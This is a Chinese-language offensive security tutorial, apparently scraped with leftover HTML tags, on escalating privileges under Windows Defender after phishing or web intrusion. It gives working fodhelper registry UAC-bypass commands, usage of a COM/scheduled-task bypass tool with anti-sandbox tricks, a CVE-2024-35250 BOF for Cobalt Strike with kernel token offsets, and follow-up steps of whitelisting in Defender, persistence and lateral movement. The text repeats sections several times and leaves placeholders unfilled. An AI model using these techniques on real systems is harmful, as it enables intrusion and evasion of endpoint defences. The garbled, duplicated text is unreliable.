Windows Defender防护下的三种提权思路详解<\/h1>

0x01 前言<\/h2>
本文详细分析在Windows Defender防护环境下三种有效的提权方法，适用于不同场景下的权限提升需求。这些方法虽然基于传统技术，但在操作细节上进行了优化以绕过现代安全防护。<\/p>

0x02 钓鱼场景下的提权方案<\/h2>

场景分析<\/h3>

钓鱼成功后通常获得管理员组用户权限但未通过UAC<\/li>
whoami \/priv<\/code>显示缺少SeImpersonatePrivilege权限<\/li>
传统土豆家族提权工具(Juicy Potato\/God Potato)无法使用<\/li>

漏洞提权受限于特定Windows版本和补丁状态<\/li>
<\/ul>
方案一：COM组件+计划任务绕过UAC<\/h3>
原理<\/h4>
利用具有自动提升UAC权限能力的COM组件，通过计划任务启动该组件实现权限提升。<\/p>
工具使用<\/h4>
项目地址：[需自行补充]

编译时建议添加简单反沙箱检测<\/p>
使用方法<\/strong>：<\/p>
bypassUAC.exe kc "your_command"
<\/code><\/pre>

第二个参数kc<\/code>用于简单绕过沙箱(可修改源码调整)<\/li>
第三个参数为要执行的命令<\/li>
<\/ul>
C2操作示例<\/strong>：<\/p>

上传bypassUAC.exe<\/li>
执行：bypassUAC.exe kc "your_payload"<\/code><\/li>
<\/ol>
分离加载场景<\/strong>：

创建run.bat脚本：<\/p>
xxx.exe shellcode.bin
<\/code><\/pre>
将第三个参数改为执行该bat脚本<\/p>
方案二：注册表键值bypass UAC<\/h3>
原理<\/h4>
利用fodhelper.exe的autoElevate属性：<\/p>

fodhelper.exe执行时会读取注册表HKCU:\Software\Classes\ms-settings\Shell\Open\command<\/code>的内容作为命令执行<\/li>
通过修改该注册表项实现权限提升<\/li>
<\/ol>
操作步骤<\/h4>
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command \/v DelegateExecute \/t REG_SZ \/d ""
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command \/ve \/t REG_SZ \/d "your_payload"
fodhelper.exe
<\/code><\/pre>
关键注意事项<\/strong>：<\/p>

必须使用免杀payload，否则Defender会拦截并显示"bypassUAC行为"警告<\/li>
用户必须在管理员组中，否则会弹出密码输入框<\/li>
<\/ul>
方案三：CVE-2024-35250 BOF加载<\/h3>
适用场景<\/h4>

主要适用于Web打点进入Windows Server服务器的情况<\/li>
对Windows 10支持有限(最高19042版本)<\/li>
在Server 2012\/2016上效果较好<\/li>
<\/ul>
使用方法<\/h4>

在Cobalt Strike中加载提供的cna文件<\/li>
无文件落地执行BOF实现免杀<\/li>
命令参数中填入payload获取绕过UAC的shell<\/li>
<\/ol>
版本支持<\/h4>
作者提供了4个不同系统偏移(EPROCESS_TOKEN_OFFSET)的.o文件：<\/p>
#define EPROCESS_TOKEN_OFFSET_WIN7 0x208
<\/span><\/span><\/span>#define EPROCESS_TOKEN_OFFSET_WIN10_1803 0x358
<\/span><\/span><\/span>#define EPROCESS_TOKEN_OFFSET_WIN10_1903 0x360
<\/span><\/span><\/span>#define EPROCESS_TOKEN_OFFSET_WIN11_21H2 0x448
<\/span><\/span><\/span><\/code><\/pre>补丁检查<\/h4>
执行前需检查目标系统是否安装了相关补丁：<\/p>
systeminfo | findstr KB5029244
<\/code><\/pre>
各版本漏洞补丁：

[需根据原文补充具体补丁号]<\/p>
0x03 方案对比与选择建议<\/h2>



方案<\/th>
适用场景<\/th>
优点<\/th>
缺点<\/th>
<\/tr>
<\/thead>


COM+计划任务<\/td>
钓鱼场景，用户在管理员组<\/td>
稳定可靠，全版本支持<\/td>
需要上传文件<\/td>
<\/tr>

注册表bypass<\/td>
钓鱼场景，用户在管理员组<\/td>
使用系统自带工具<\/td>
依赖免杀payload<\/td>
<\/tr>

CVE-2024-35250<\/td>
Web打点进入Server<\/td>
无文件落地<\/td>
版本限制大，需未打补丁<\/td>
<\/tr>
<\/tbody>
<\/table>
0x04 后续操作建议<\/h2>
成功提权后：<\/p>

添加Defender白名单<\/li>
建立持久化机制<\/li>
开始内网横向移动<\/li>
<\/ol>
0x05 防御建议<\/h2>

限制普通用户的管理员权限<\/li>
及时安装系统补丁<\/li>
监控注册表关键位置修改<\/li>
加强端点防护的UAC绕过检测能力<\/li>
<\/ol>

方案<\/th>	适用场景<\/th>	优点<\/th>	缺点<\/th> <\/tr> <\/thead>
COM+计划任务<\/td>	钓鱼场景，用户在管理员组<\/td>	稳定可靠，全版本支持<\/td>	需要上传文件<\/td> <\/tr>
注册表bypass<\/td>	钓鱼场景，用户在管理员组<\/td>	使用系统自带工具<\/td>	依赖免杀payload<\/td> <\/tr>
CVE-2024-35250<\/td>	Web打点进入Server<\/td>	无文件落地<\/td>	版本限制大，需未打补丁<\/td> <\/tr> <\/tbody> <\/table> 0x04 后续操作建议<\/h2> 成功提权后：<\/p> 添加Defender白名单<\/li> 建立持久化机制<\/li> 开始内网横向移动<\/li> <\/ol> 0x05 防御建议<\/h2> 限制普通用户的管理员权限<\/li> 及时安装系统补丁<\/li> 监控注册表关键位置修改<\/li> 加强端点防护的UAC绕过检测能力<\/li> <\/ol>

Windows Defender防护下的三种提权思路详解<\/h1>

0x01 前言<\/h2> 本文详细分析在Windows Defender防护环境下三种有效的提权方法，适用于不同场景下的权限提升需求。这些方法虽然基于传统技术，但在操作细节上进行了优化以绕过现代安全防护。<\/p>

0x02 钓鱼场景下的提权方案<\/h2>

方案一：COM组件+计划任务绕过UAC<\/h3>

原理<\/h4> 利用具有自动提升UAC权限能力的COM组件，通过计划任务启动该组件实现权限提升。<\/p>

方案二：注册表键值bypass UAC<\/h3>

方案三：CVE-2024-35250 BOF加载<\/h3>

0x05 防御建议<\/h2> 限制普通用户的管理员权限<\/li> 及时安装系统补丁<\/li> 监控注册表关键位置修改<\/li> 加强端点防护的UAC绕过检测能力<\/li> <\/ol>

0x01 前言<\/h2>
本文详细分析在Windows Defender防护环境下三种有效的提权方法，适用于不同场景下的权限提升需求。这些方法虽然基于传统技术，但在操作细节上进行了优化以绕过现代安全防护。<\/p>

原理<\/h4>
利用具有自动提升UAC权限能力的COM组件，通过计划任务启动该组件实现权限提升。<\/p>

0x05 防御建议<\/h2>

限制普通用户的管理员权限<\/li>
及时安装系统补丁<\/li>
监控注册表关键位置修改<\/li>
加强端点防护的UAC绕过检测能力<\/li> <\/ol>